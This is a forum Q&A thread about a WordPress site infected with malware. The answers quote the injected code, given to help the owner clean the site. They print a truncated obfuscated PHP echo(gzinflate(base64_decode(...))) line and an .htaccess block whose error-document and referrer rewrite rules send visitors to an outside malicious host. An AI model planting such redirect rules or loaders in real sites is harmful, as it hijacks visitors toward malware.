# download count29.php when loading site

Tags: php, wordpress

When my site is loading file `count29.php` to be downloaded from the site `avondov.ru`. This makes the site not loading completely and sometimes redirect to 404 page not found

how can I do ignore this error?

my web site is: http://adinehbajestan.ir

Comment: How do I fix this error?

Answer (score 2, accepted):

Your site is infected with malware, 
http://sitecheck.sucuri.net/results/adinehbajestan.ir

Update your site scripts and/ or Restore from backup

Answer (score 0):

i think i found my problem. this is a realy malware. this code was added in header.php:

```
#d93065#
echo(gzinflate(base64_decode("3VXBbptAEP2V......1G5y+828z/8A")));
#/d93065#
```

when remove this code from header.php is correct.

Comment: Also consider Updating wordpress to latest version

Answer (score 0):

yes, mostly the base page like index.php or header.php gets modified with

```
#d93065# echo(gzinflate(base64_decode("3VXBbptAEP2V......1G5y+828z/8A"))); #/d93065#
```

also, dont forget to clean all the .htaccess file, they get modified with this unwanted redirection

```
#d93065#
RewriteEngine On
ErrorDocument 400 avondov.ru/count29.php 
ErrorDocument 401 avondov.ru/count29.php
ErrorDocument 403 avondov.ru/count29.php
ErrorDocument 404 avondov.ru/count29.php
ErrorDocument 500 avondov.ru/count29.php
ErrorDocument 502 avondov.ru/count29.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
# long list of referrers
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ avondov.ru/count29.php [R=301,L]
#/d93065#
```

This is a tempororary workaround but the intruder can modify again the same way he did,
it may be caused by a weak password, buggy third part plugin or maybe a bug in the CMS that you are using because it has infiltrated joomla and wordpress sites.

-CK